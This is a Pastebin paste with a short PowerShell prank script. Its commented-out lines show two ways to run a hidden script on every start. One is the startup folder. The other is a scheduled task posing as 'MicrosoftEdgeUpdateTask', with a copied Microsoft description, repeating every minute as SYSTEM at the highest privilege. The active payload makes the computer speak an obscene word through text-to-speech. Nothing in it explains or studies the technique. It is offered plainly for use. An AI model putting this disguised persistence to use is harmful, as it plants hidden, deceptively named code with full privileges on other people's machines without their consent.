Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #script.cmd dans shell:startup
- #powershell -NoProfile -WindowStyle Hidden -file "C:\Temp\073096.ps1
- #or
- #$description = "Keeps your Microsoft software up to date. If this task is disabled or stopped, your Microsoft software will not be kept up to date, meaning security vulnerabilities that may arise cannot be fixed and features may not work. This task uninstalls itself when there is no Microsoft software using it."
- #$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -file "C:\Temp\073096.ps1"'
- #$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1)
- #$principal = New-ScheduledTaskPrincipal -UserID "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount -RunLevel Highest
- #$settings = New-ScheduledTaskSettingsSet -MultipleInstances Parallel
- #Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTask" -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Description $description
- #Start-ScheduledTask -TaskName MicrosoftEdgeUpdateTask
- ##Unregister-ScheduledTask -TaskName MicrosoftEdgeUpdateTask -Confirm:$false
- Add-Type -AssemblyName System.speech
- $TextToSpeech = New-Object System.Speech.Synthesis.SpeechSynthesizer
- $TextToSpeech.Rate = -3
- $TextToSpeech.Speak("Penis")
Add Comment
Please, Sign In to add comment